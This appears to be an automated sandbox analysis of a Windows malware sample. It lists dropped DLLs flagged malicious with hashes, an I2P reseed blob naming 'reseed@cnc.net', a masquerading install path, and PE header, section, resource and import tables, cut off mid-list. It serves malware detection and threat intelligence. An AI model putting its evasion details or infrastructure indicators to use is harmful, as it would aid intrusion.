                                  SHA-512:CDBCC2FD4195A6FA5A343234A745E3E7A558F68A496D376FDF6A86D585C9FA39A64F0CEB20A2D2E6E30E59BA46F62493E500D6EEB033FA981DAA60F00EE42F14
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):62449
                                  Entropy (8bit):7.807149241969407
                                  Encrypted:false
                                  SSDEEP:1536:uzSVMhnCwJEZ4dJ4douBYaGGIW2QzPzp343mR:vKE29uBFBo2R
                                  MD5:688FDFAE15F328A84E8F19F8F4193AF2
                                  SHA1:C65D4CDA0C93B84154DFBC065AE78B9E2F7ECFA8
                                  SHA-256:8D37FF2458FDE376A41E9E702A9049FF89E78B75669C0F681CFCAFBA9D49688E
                                  SHA-512:F19BC7F204DBE3449ABE9494BFFF8BE632F20F1B4B8272F0AF71C4CEC344A20617C0909C024CB4A4E0C6B266D386CB127554DC70F3A6AA7A81DAF1A8748F5D2D
                                  Malicious:false
                                  Preview:I2Psu3.................................1726476901......reseed@cnc.netPK.........E0Y.L.`........;...routerInfo-CVE7qh1P~hZ~PX2FDY6wRTmrdDd1eQ5Nv7yBC0EcH-o=.dat.^...)....?E4T{w...U........5.x.Z*T.v...C..~m.....r.u.._..0*._>a....B.......1in..o...R...M.....2.0..1...?.&..1@.._.s....KrbA.-..5c..Nzvep.KU.s.n...Gy.E.y...GU.c..A.i.[HU..{I@v..5c.-..53....5..f Kpp..c....:.N..I..u..~~..u....%a........~F>.&.9..I..........\..Ff&..f...!CL!#.!....[.3..:.......J....:..DO...B.l.\gc....r...P__W[..C[......_.d#wG.t....ts.rG. .R.@...b....*c..t..#[...l......D.....<.0...B. ].4...P....(...J...>2.02243....}dll`aan`bj...................%...F..~Q......>....If.a..%..!...E......@...BD...d:..!.b'sDZ.5k^j.g.H\..JI..../..IM,N.N-.:..Z.I"(..$............+..e.....Y..[_...U....t.....n8CEbM...k.%W.^....`i..&[.Y.{}...d.Vn.g..0...PK.........>0Y....:.......;...routerInfo-7xGNdz1Bi17~K7q9lFTjGVPnQdN0tqNJ-xpZt5MSp1Q=.dat{lr...~./..<Yw_...".....%..E.....O..l.(.R<K^...>.i..{.D.s-.+...
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):92672
                                  Entropy (8bit):6.242846530333761
                                  Encrypted:false
                                  SSDEEP:1536:Eb84+EBwpVmTx3sJg0jsEv5YqKnbGGOO5YhNDE:Eb84+EB7x3sJXwExKb/OOv
                                  MD5:FDCF93ACD089B505B524DDFA0FF947F9
                                  SHA1:A2BADA5807BA001758DBCE46DA634332A5CC14C2
                                  SHA-256:ADFE373F98CABF338577963DCEA279103C19FF04B1742DC748B9477DC0156BB4
                                  SHA-512:110455DC5C3F090A1341EE6D09D9B327CD03999C70D4A2C0B762B91BC334B0448E750CB1FD7B34CE729B8E1CD33B55A4E1FA1187586C2FF8850B2FD907AFE03E
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):105984
                                  Entropy (8bit):6.2884725801282775
                                  Encrypted:false
                                  SSDEEP:1536:wPwNKEKbLqYQtCwCxJtpyYNPvo3cxwNn6anP8XOCYA8CSs8qgu06wCYA8CSs8qgm:gwnKvqTaxJtpRP7wNbnP8Xf
                                  MD5:91A0DD29773FBFB7112C5FCFF1873C13
                                  SHA1:E1EAF1EFB134CAA7DA5AAA362830A68AB705C023
                                  SHA-256:AE2D023EBBFEEFD5A26EAA255AD3862C9A1C276BB0B46FF88EA9A9999406D6B6
                                  SHA-512:F7A665A218BB2CCEC32326B0E0A9845B2981F17445B5CB54BBA7D6EF9E200B4538EBD19916C2DACB0BBE1B409C14A499B23BA707874AE1F1B154279C90DC33DD
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):115200
                                  Entropy (8bit):6.220212606349767
                                  Encrypted:false
                                  SSDEEP:1536:GQTj0nA3CwwEWLUbltMR8tGZ9G+Yv953a6nfgXqobk5l:GQP02C7LUbltdQG+Yra64Xqo45l
                                  MD5:BE6174AE2B452DA9D00F9C7C4D8A675B
                                  SHA1:0ABD2C76C82416AE9C30124C43802E2E49C8ED28
                                  SHA-256:A62BDF318386AAAB93F1D25144CFBDC1A1125AAAD867EFC4E49FE79590181EBF
                                  SHA-512:5631B1595F8CEE8C0DFA991852259FEE17EA8B73A9EED900A10450BBB7C846ACFC88C32930BE379D60EFA6AE1BBBEAD0A605A9F36E20129B53BCA36B13BA5858
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):115712
                                  Entropy (8bit):6.277217301921545
                                  Encrypted:false
                                  SSDEEP:1536:UsmIeUIfJAH791hpVMjqZm4S53kp21ahrvffvTn+33333333333333333333333L:I5fJAHZ1Kj7hkUYr3TlX8Y/biF
                                  MD5:D0F0423AEEE6B6FF6754D860603D46D0
                                  SHA1:A06F3B9605B3398BA68154DA39ADF26DDEE41743
                                  SHA-256:81DA68F52DF2ED997C374CCBEFC56849650770FB30EDA8F202BBC7FC3FE6A51D
                                  SHA-512:C30FAEDE4520FF1C859B8B39E351112CFC60DAECA98B1359F9F86AB79BCFB996BA84F35A5B178B4ABEC66152864720E58F741AE13D06B64913E240A1F9E6A633
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  File Type:PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
                                  Category:dropped
                                  Size (bytes):104448
                                  Entropy (8bit):6.259370376612282
                                  Encrypted:false
                                  SSDEEP:1536:VQbC3TviBZTprAFnfkRAJhzTjvlsy2nD+cRi6ZQOobsAx34:VGC3TKBZTWJfImTjx2D+ei6ZQOkx34
                                  MD5:7A8E8A0842D8D65713DEE5393E806755
                                  SHA1:AF6F3A52009FBF62C21A290EFC34A94C151B683E
                                  SHA-256:51C131081921626D22FAF44977D5E4DCFE00E5D6CDDEDA877A82F13631BE7C2E
                                  SHA-512:D1B8D93B7EFBEAA348D3A01293AD5D92BC8F28EB2554DF5E6E71506D00D135390082C52C18D0BC3F0439B068777D8B2C43AAED930C72E5FFAB2593EEAC470CF4
                                  Malicious:true
                                  Antivirus:
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Process:C:\Windows\System32\WerFault.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.416763990942278
                                  Encrypted:false
                                  SSDEEP:6144:Ocifpi6ceLPL9skLmb0m9SWSPtaJG8nAgex285i2MMhA20X4WABlGuNq5+:bi589SWIZBk2MM6AFBIo
                                  MD5:4EFF99FE879DB6535AD7E78FCB686775
                                  SHA1:BF11988083F31D66BDE964F4D129D926A9A79F84
                                  SHA-256:CC510FFBF60976662EAFE6BB4BE7A1C4E399D0E1355FF58A36EDC6F0B143BD47
                                  SHA-512:C891299EEFE312EFA6F3D241E5D5B06984D44182D2117B4DE52F1D5FAC1C357F42A435AB0CAAB0AE9C14D7F10F94B53ECED615E7FB579CE893887C1FDA14DB71
                                  Malicious:false
                                  Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmJ."<.................................................................................................................................................................................................................................................................................................................................................W5.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                  Entropy (8bit):6.081762342853164
                                  TrID:
                                  • Win64 Executable GUI (202006/5) 92.64%
                                  • Win64 Executable (generic) (12005/4) 5.51%
                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                  • DOS Executable Generic (2002/1) 0.92%
                                  • VXD Driver (31/22) 0.01%
                                  File name:file.exe
                                  File size:11'950'592 bytes
                                  MD5:07fc5b4f3a432b09b0d51f8b00ef05f3
                                  SHA1:b098b5f859f45314d5edd03aad9eab420bbdec40
                                  SHA256:d65629e6028c54eb383b310547426ed1907296a14a2e8977b9d469126de1f8a9
                                  SHA512:ba4c21a022ea2253f26400c7d247d1b886f29e7d2e8722d3c1545830695106168605a963e448651e7d2613545ad903f4dbd17e09e30ed2167d5e65755794c888
                                  SSDEEP:98304:CdwqvpPlIpF6+2UT0lursS0lU7heqdQI:qwqhPlIp12C0luoU7h
                                  TLSH:E8C65B7F76A18629C22EC23AC0A38F04E93370BD1733C6E793A45169DF599D45E3E624
                                  File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win64..$7.......................................................................................................................................
                                  Icon Hash:1f6c6cececf16117
                                  Entrypoint:0xcb1f90
                                  Entrypoint Section:.text
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                  DLL Characteristics:
                                  Time Stamp:0x66F308C3 [Tue Sep 24 18:45:23 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:2
                                  File Version Major:5
                                  File Version Minor:2
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:2
                                  Import Hash:266fe50b75556d32a77ba4347fd8a6b3
                                  Instruction
                                  push ebp
                                  dec eax
                                  sub esp, 20h
                                  dec eax
                                  mov ebp, esp
                                  nop
                                  dec eax
                                  lea ecx, dword ptr [FFFE9B08h]
                                  call 00007FEE805B8FE0h
                                  dec eax
                                  mov eax, dword ptr [000BB09Ch]
                                  dec eax
                                  mov ecx, dword ptr [eax]
                                  call 00007FEE80877031h
                                  dec eax
                                  mov eax, dword ptr [000BB08Dh]
                                  dec eax
                                  mov ecx, dword ptr [eax]
                                  mov dl, 01h
                                  call 00007FEE80879CE0h
                                  dec eax
                                  mov eax, dword ptr [000BB07Ch]
                                  dec eax
                                  mov ecx, dword ptr [eax]
                                  dec eax
                                  mov edx, dword ptr [FFFE939Ah]
                                  dec esp
                                  mov eax, dword ptr [000BB77Bh]
                                  call 00007FEE80877033h
                                  dec eax
                                  mov eax, dword ptr [000BB05Fh]
                                  dec eax
                                  mov ecx, dword ptr [eax]
                                  call 00007FEE80877244h
                                  call 00007FEE805B0A0Fh
                                  jmp 00007FEE80E52E6Ah
                                  nop
                                  nop
                                  call 00007FEE805B0C06h
                                  nop
                                  dec eax
                                  lea esp, dword ptr [ebp+20h]
                                  pop ebp
                                  ret
                                  dec eax
                                  nop
                                  dec eax
                                  lea eax, dword ptr [00000000h+eax]
                                  dec eax
                                  sub esp, 28h
                                  call 00007FEE805B019Ch
                                  dec eax
                                  add esp, 28h
                                  ret
                                  int3
                                  int3
                                  Name | Virtual Address | Virtual Size | Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x99e000 | 0x9d | .edata
                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x98e000 | 0x50c6 | .idata
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa8d000 | 0x100200 | .rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0xa1c000 | 0x70b30 | .pdata
                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x9a1000 | 0x7a060 | .reloc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x9a0000 | 0x28 | .rdata
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x98f500 | 0x1320 | .idata
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x994000 | 0x914c | .didata
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                  .text | 0x1000 | 0x8b1020 | 0x8b1200 | 375a7695d7a014dcd497198eb48daff1 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                  .data | 0x8b3000 | 0xbab68 | 0xbac00 | 8576115677fae01541a8758828a6f879 | False | 0.2308975485274431 | data | 4.9676295748628565 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .bss | 0x96e000 | 0x1f0cc | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .idata | 0x98e000 | 0x50c6 | 0x5200 | a8f85f9f35e1c8e857717f7fdcac1451 | False | 0.24471227134146342 | data | 4.360232251720157 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .didata | 0x994000 | 0x914c | 0x9200 | c9086741b6c150ce3727b78eeda72390 | False | 0.17133989726027396 | data | 3.975549279463611 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .edata | 0x99e000 | 0x9d | 0x200 | 893e24d9392a63a4bd48cfc340b37cc7 | False | 0.26171875 | data | 1.9432984069935513 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .tls | 0x99f000 | 0x370 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rdata | 0x9a0000 | 0x6d | 0x200 | 3a09e226e89da21473e0f2289fb020ea | False | 0.197265625 | data | 1.370336840113611 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .reloc | 0x9a1000 | 0x7a060 | 0x7a200 | fdb73105589a0ad9d40ae623e4b179e4 | False | 0.43909328620777893 | data | 6.432756868541645 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                  .pdata | 0xa1c000 | 0x70b30 | 0x70c00 | ac0dd8c50313df6cc28cac3e8c6627d7 | False | 0.49761164426274945 | data | 6.507502255985033 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                  .rsrc | 0xa8d000 | 0x100200 | 0x100200 | cd873dd086182eed8b4534ff56eddd02 | False | 0.33761896046852125 | data | 6.472835483270941 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_CURSOR | 0xa8e0a0 | 0x134 | Targa image data - Map 64 x 65536 x 1 +32 "\001" | English | United States | 0.38636363636363635 |
| RT_CURSOR | 0xa8e1d4 | 0x134 | data | English | United States | 0.4642857142857143 |
| RT_CURSOR | 0xa8e308 | 0x134 | data | English | United States | 0.4805194805194805 |
| RT_CURSOR | 0xa8e43c | 0x134 | data | English | United States | 0.38311688311688313 |
| RT_CURSOR | 0xa8e570 | 0x134 | data | English | United States | 0.36038961038961037 |
| RT_CURSOR | 0xa8e6a4 | 0x134 | data | English | United States | 0.4090909090909091 |
| RT_CURSOR | 0xa8e7d8 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4967532467532468 |
| RT_ICON | 0xa8e90c | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2688 | | | 0.4147121535181237 |
| RT_ICON | 0xa8f7b4 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | | | 0.476985559566787 |
| RT_ICON | 0xa9005c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | | | 0.48554913294797686 |
| RT_ICON | 0xa905c4 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | | | 0.5167012448132781 |
| RT_ICON | 0xa92b6c | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | | | 0.5719981238273921 |
| RT_ICON | 0xa93c14 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | | | 0.7109929078014184 |
| RT_STRING | 0xa9407c | 0x4ec | data | | | 0.3595238095238095 |
| RT_STRING | 0xa94568 | 0x7d4 | data | | | 0.3373253493013972 |
| RT_STRING | 0xa94d3c | 0x6c8 | data | | | 0.3675115207373272 |
| RT_STRING | 0xa95404 | 0x6ec | data | | | 0.3741534988713318 |
| RT_STRING | 0xa95af0 | 0x69c | data | | | 0.324468085106383 |
| RT_STRING | 0xa9618c | 0x54c | data | | | 0.3414454277286136 |
| RT_STRING | 0xa966d8 | 0x888 | data | | | 0.2793040293040293 |
| RT_STRING | 0xa96f60 | 0x518 | data | | | 0.36809815950920244 |
| RT_STRING | 0xa97478 | 0xcb8 | data | | | 0.2976044226044226 |
| RT_STRING | 0xa98130 | 0x5ac | data | | | 0.3856749311294766 |
| RT_STRING | 0xa986dc | 0x690 | data | | | 0.31785714285714284 |
| RT_STRING | 0xa98d6c | 0x764 | data | | | 0.2869978858350951 |
| RT_STRING | 0xa994d0 | 0x69c | data | | | 0.3321513002364066 |
| RT_STRING | 0xa99b6c | 0x4e4 | data | | | 0.3586261980830671 |
| RT_STRING | 0xa9a050 | 0x528 | data | | | 0.33484848484848484 |
| RT_STRING | 0xa9a578 | 0x5ac | data | | | 0.3443526170798898 |
| RT_STRING | 0xa9ab24 | 0x390 | data | | | 0.44298245614035087 |
| RT_STRING | 0xa9aeb4 | 0x3d4 | data | | | 0.4153061224489796 |
| RT_STRING | 0xa9b288 | 0x53c | data | | | 0.3082089552238806 |
| RT_STRING | 0xa9b7c4 | 0x3d0 | data | | | 0.3719262295081967 |
| RT_STRING | 0xa9bb94 | 0x2c0 | data | | | 0.4303977272727273 |
| RT_STRING | 0xa9be54 | 0x124 | data | | | 0.6061643835616438 |
| RT_STRING | 0xa9bf78 | 0x320 | data | | | 0.45125 |
| RT_STRING | 0xa9c298 | 0x478 | data | | | 0.3758741258741259 |
| RT_STRING | 0xa9c710 | 0x560 | data | | | 0.35319767441860467 |
| RT_STRING | 0xa9cc70 | 0x508 | data | | | 0.3517080745341615 |
| RT_STRING | 0xa9d178 | 0x33c | data | | | 0.3321256038647343 |
| RT_STRING | 0xa9d4b4 | 0x408 | data | | | 0.40310077519379844 |
| RT_STRING | 0xa9d8bc | 0xd8 | data | | | 0.6666666666666666 |
| RT_STRING | 0xa9d994 | 0xd0 | data | | | 0.6634615384615384 |
| RT_STRING | 0xa9da64 | 0x2f4 | data | | | 0.44576719576719576 |
| RT_STRING | 0xa9dd58 | 0x3e0 | data | | | 0.3780241935483871 |
| RT_STRING | 0xa9e138 | 0x398 | data | | | 0.3793478260869565 |
| RT_STRING | 0xa9e4d0 | 0x52c | data | | | 0.31797583081570996 |
| RT_STRING | 0xa9e9fc | 0x210 | data | | | 0.32007575757575757 |
| RT_STRING | 0xa9ec0c | 0x460 | data | | | 0.40625 |
| RT_STRING | 0xa9f06c | 0x664 | data | | | 0.35146699266503667 |
| RT_STRING | 0xa9f6d0 | 0x4f4 | data | | | 0.35252365930599366 |
| RT_STRING | 0xa9fbc4 | 0x3a0 | data | | | 0.3728448275862069 |
| RT_STRING | 0xa9ff64 | 0x348 | data | | | 0.39166666666666666 |
| RT_STRING | 0xaa02ac | 0x3bc | data | | | 0.36506276150627615 |
| RT_STRING | 0xaa0668 | 0x410 | data | | | 0.3798076923076923 |
| RT_STRING | 0xaa0a78 | 0xe8 | data | | | 0.5474137931034483 |
| RT_STRING | 0xaa0b60 | 0xc4 | data | | | 0.6275510204081632 |
| RT_STRING | 0xaa0c24 | 0x268 | data | | | 0.48863636363636365 |
| RT_STRING | 0xaa0e8c | 0x434 | data | | | 0.3308550185873606 |
| RT_STRING | 0xaa12c0 | 0x360 | data | | | 0.38425925925925924 |
| RT_STRING | 0xaa1620 | 0x2ec | data | | | 0.37566844919786097 |
| RT_STRING | 0xaa190c | 0x31c | data | | | 0.34296482412060303 |
| RT_RCDATA | 0xaa1c28 | 0x627e | JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=6, datetime=2010:05:11 20:59:59], baseline, precision 8, 256x256, components 3 | English | United States | 0.9922265408106608 |
| RT_RCDATA | 0xaa7ea8 | 0x10 | data | | | 1.5 |
| RT_RCDATA | 0xaa7eb8 | 0x40969 | data | English | United States | 0.5729551356438974 |
| RT_RCDATA | 0xae8824 | 0x101c | data | | | 0.4604752667313288 |
| RT_RCDATA | 0xae9840 | 0x151 | Delphi compiled form 'TForm1' | | | 0.7210682492581603 |
| RT_RCDATA | 0xae9994 | 0x87b | Delphi compiled form '\031TfrmFDGUIxFMXAsyncExecute\030frmFDGUIxFMXAsyncExecute\004Left\002' | | | 0.43574389682174114 |
| RT_RCDATA | 0xaea210 | 0xcbc | Delphi compiled form 'TfrmFDGUIxFMXOptsBase' | | | 0.6263803680981596 |
| RT_RCDATA | 0xaeaecc | 0x4c651 | data | English | United States | 0.17103795623703713 |
| RT_RCDATA | 0xb37520 | 0x5580d | data | English | United States | 0.2652239585861499 |
| RT_GROUP_CURSOR | 0xb8cd30 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25 |
| RT_GROUP_CURSOR | 0xb8cd44 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.25 |
| RT_GROUP_CURSOR | 0xb8cd58 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0xb8cd6c | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0xb8cd80 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0xb8cd94 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_CURSOR | 0xb8cda8 | 0x14 | Lotus unknown worksheet or configuration, revision 0x1 | English | United States | 1.3 |
| RT_GROUP_ICON | 0xb8cdbc | 0x5a | data | | | 0.7 |
| RT_VERSION | 0xb8ce18 | 0x368 | data | English | United States | 0.44954128440366975 |

| DLL | Import |
|---|---|
| oleaut32.dll | SysFreeString, SysReAllocStringLen, SysAllocStringLen |
| advapi32.dll | RegQueryValueExW, RegOpenKeyExW, RegCloseKey |
| user32.dll | CharNextW, LoadStringW |
| kernel32.dll | Sleep, VirtualFree, VirtualAlloc, lstrlenW, VirtualQuery, QueryPerformanceCounter, GetTickCount, GetSystemInfo, GetVersion, CompareStringW, IsValidLocale, SetThreadLocale, GetSystemDefaultUILanguage, GetUserDefaultUILanguage, GetLocaleInfoW, WideCharToMultiByte, MultiByteToWideChar, GetACP, LoadLibraryExW, GetStartupInfoW, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetCommandLineW, FindResourceW, FreeLibrary, GetLastError, UnhandledExceptionFilter, RtlUnwindEx, RtlUnwind, RaiseException, ExitProcess, ExitThread, SwitchToThread, GetCurrentThreadId, CreateThread, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, FindFirstFileW, FindClose, WriteFile, GetStdHandle, CloseHandle |
| kernel32.dll | GetProcAddress, RaiseException, LoadLibraryA, GetLastError, TlsSetValue, TlsGetValue, LocalFree, LocalAlloc, GetModuleHandleW, FreeLibrary |
| user32.dll | WINNLSEnableIME, SetClassLongPtrW, GetClassLongPtrW, SetWindowLongPtrW, GetWindowLongPtrW, CreateWindowExW, WindowFromPoint, WaitMessage, UpdateLayeredWindow, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, TrackMouseEvent, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCaret, SetWindowRgn, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursorPos, SetCursor, SetClipboardData, SetCapture, SetActiveWindow, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindow, ScreenToClient, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OpenClipboard, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxIndirectW, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, InsertMenuItemW, InsertMenuW, HideCaret, GetWindowThreadProcessId, GetWindowTextLengthW, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowDC, GetUpdateRgn, GetUpdateRect, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetScrollBarInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageExtraInfo, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgCtrlID, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameW, GetClassInfoExW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EndMenu, EnableWindow, EnableScrollBar, EnableMenuItem, EmptyClipboard, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, CreateAcceleratorTableW, CopyImage, CopyIcon, CloseClipboard, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharUpperW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BeginPaint, AppendMenuW, AdjustWindowRectEx, ActivateKeyboardLayout |
| gdi32.dll | UnrealizeObject, TextOutW, StretchDIBits, StretchBlt, StartPage, StartDocW, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetTextAlign, SetStretchBltMode, SetRectRgn, SetROP2, SetPixel, SetMapMode, SetEnhMetaFileBits, SetDIBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SetAbortProc, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, Rectangle, RectVisible, RealizePalette, Polyline, Polygon, PolyBezierTo, PolyBezier, PlayEnhMetaFile, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetRegionData, GetPixel, GetPaletteEntries, GetObjectA, GetObjectW, GetMapMode, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionW, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetCurrentPositionEx, GetClipBox, GetCharABCWidthsFloatW, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExtCreateRegion, ExcludeClipRect, EnumFontsW, EnumFontFamiliesExW, EndPage, EndDoc, Ellipse, 